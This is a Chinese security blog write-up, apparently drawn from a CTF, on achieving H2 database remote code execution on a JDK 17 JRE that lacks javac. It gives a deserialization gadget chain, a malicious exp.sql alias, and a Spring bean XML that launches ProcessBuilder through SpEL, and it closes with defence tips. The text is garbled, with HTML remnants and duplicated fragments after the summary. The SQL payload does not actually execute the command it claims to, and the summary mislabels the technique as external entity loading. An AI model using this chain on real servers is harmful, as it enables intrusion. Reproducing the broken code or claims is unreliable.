高版本JRE环境下H2 RCE绕过新思路深度解析<\/h1>

前言<\/h2>
本文详细分析在高版本JRE（特别是JDK 17）环境下如何绕过限制实现H2数据库的远程代码执行(RCE)。传统H2 RCE在JDK环境下较为容易利用，但在JRE环境下，特别是缺少javac命令时，需要采用新的绕过技术。<\/p>

环境分析<\/h2>

目标环境特征<\/h3>

存在反序列化漏洞入口<\/li> <\/ul>

关键依赖<\/h3>

通过分析pom.xml<\/code>文件发现：<\/p>


H2数据库依赖<\/li>
Jackson原生反序列化功能<\/li>
<\/ul>
漏洞利用链分析<\/h2>
基本利用链<\/h3>

反序列化入口：基础的反序列化路由，无过滤<\/li>
MyDataSource<\/code>类：用于触发H2的sink点<\/li>
Jackson原生反序列化：通过调用getter方法触发漏洞<\/li>
<\/ol>
调用栈流程<\/h3>

readObject:309, EventListenerList (javax.swing.event)<\/code><\/li>
调用toString:695, UndoManager (javax.swing.undo)<\/code><\/li>
通过父类方法调用链最终触发writeValueAsString<\/code><\/li>
调用DataSource<\/code>的getter方法<\/li>
通过JDBC操作触发RCE<\/li>
<\/ol>
JDK与JRE环境差异<\/h2>
JDK环境下<\/h3>

可直接使用javac<\/code>编译并执行代码<\/li>
典型利用方式是直接弹出计算器<\/li>
<\/ul>
JRE环境下限制<\/h3>

缺少javac<\/code>命令<\/li>
无法直接编译执行Java代码<\/li>
<\/ul>
JRE环境下的绕过技术<\/h2>
静态方法利用<\/h3>
参考思路来自NCTF 2024 Web Writeup<\/a>，虽然缺少javac，但仍可调用Java的静态方法。<\/p>
关键类：ReflectUtils<\/h3>

提供大量静态方法<\/li>
可用于反射调用指定类方法或实例化类<\/li>
是理想的利用点<\/li>
<\/ul>
具体绕过方案<\/h3>
使用ClassPathXmlApplicationContext<\/code>类：<\/p>

该类在实例化时可加载外部XML文件<\/li>
题目环境出网，可加载远程恶意XML<\/li>
XML文件可包含SpEL表达式实现RCE<\/li>
<\/ol>
类型转换问题与绕过<\/h2>
问题描述<\/h3>
H2不支持JAVA_OBJECT<\/code>与VARCHAR<\/code>(CHARACTER VARYING)类型之间的直接转换。<\/p>
解决方案<\/h3>
使用javax.naming.ldap.Rdn.unescapeValue<\/code>方法：<\/p>

接收String参数<\/li>
转换为Object类型<\/li>
静态方法调用<\/li>
<\/ul>
完整Payload构造<\/h2>
恶意SQL脚本(exp.sql)<\/h3>
CREATE<\/span> ALIAS<\/span> EXEC<\/span> AS<\/span> '
<\/span><\/span><\/span>String r(String cmd) throws Exception {
<\/span><\/span><\/span>    javax.naming.ldap.Rdn rdn = new javax.naming.ldap.Rdn("a", cmd);
<\/span><\/span><\/span>    return rdn.toString();
<\/span><\/span><\/span>}
<\/span><\/span><\/span>'<\/span>;
<\/span><\/span>CALL<\/span> EXEC<\/span>('恶意命令'<\/span>);
<\/span><\/span><\/code><\/pre>恶意XML文件示例<\/h3>
<beans<\/span> xmlns=<\/span>"http:\/\/www.springframework.org\/schema\/beans"<\/span>
<\/span><\/span>       xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span>
<\/span><\/span>       xsi:schemaLocation=<\/span>"http:\/\/www.springframework.org\/schema\/beans
<\/span><\/span><\/span>        http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd"<\/span>><\/span>
<\/span><\/span>    <bean<\/span> id=<\/span>"pb"<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span>
<\/span><\/span>        <constructor-arg><\/span>
<\/span><\/span>            <list><\/span>
<\/span><\/span>                <value><\/span>calc.exe<\/value><\/span>
<\/span><\/span>            <\/list><\/span>
<\/span><\/span>        <\/constructor-arg><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"whatever"<\/span> value=<\/span>"#{pb.start()}"<\/span>\/><\/span>
<\/span><\/span>    <\/bean><\/span>
<\/span><\/span><\/beans><\/span>
<\/span><\/span><\/code><\/pre>调用栈分析<\/h2>

加载远程XML内容<\/li>
解析XML文件<\/li>
实例化ProcessBuilder<\/code><\/li>
执行恶意命令<\/li>
成功实现RCE<\/li>
<\/ol>
防御建议<\/h2>

升级H2数据库到最新版本<\/li>
限制反序列化操作，使用白名单机制<\/li>
对JDBC连接URL进行严格校验<\/li>
在JRE环境中移除不必要的类和方法<\/li>
实施网络访问控制，限制出站连接<\/li>
<\/ol>
总结<\/h2>
本文详细分析了在高版本JRE环境下绕过限制实现H2 RCE的新思路，重点解决了缺少javac命令时的利用难题，通过静态方法调用和XML外部实体加载实现了完整的攻击链。这种技术对于安全研究和防御策略制定都具有重要参考价值。<\/p>

高版本JRE环境下H2 RCE绕过新思路深度解析<\/h1>

前言<\/h2> 本文详细分析在高版本JRE（特别是JDK 17）环境下如何绕过限制实现H2数据库的远程代码执行(RCE)。传统H2 RCE在JDK环境下较为容易利用，但在JRE环境下，特别是缺少javac命令时，需要采用新的绕过技术。<\/p>

环境分析<\/h2>

漏洞利用链分析<\/h2>

JDK与JRE环境差异<\/h2>

JRE环境下的绕过技术<\/h2>

静态方法利用<\/h3> 参考思路来自NCTF 2024 Web Writeup<\/a>，虽然缺少javac，但仍可调用Java的静态方法。<\/p>

类型转换问题与绕过<\/h2>

问题描述<\/h3> H2不支持JAVA_OBJECT<\/code>与VARCHAR<\/code>(CHARACTER VARYING)类型之间的直接转换。<\/p>

完整Payload构造<\/h2>

前言<\/h2>
本文详细分析在高版本JRE（特别是JDK 17）环境下如何绕过限制实现H2数据库的远程代码执行(RCE)。传统H2 RCE在JDK环境下较为容易利用，但在JRE环境下，特别是缺少javac命令时，需要采用新的绕过技术。<\/p>

静态方法利用<\/h3>
参考思路来自NCTF 2024 Web Writeup<\/a>，虽然缺少javac，但仍可调用Java的静态方法。<\/p>

问题描述<\/h3>
H2不支持`JAVA_OBJECT<\/code>与VARCHAR<\/code>(CHARACTER VARYING)类型之间的直接转换。<\/p>`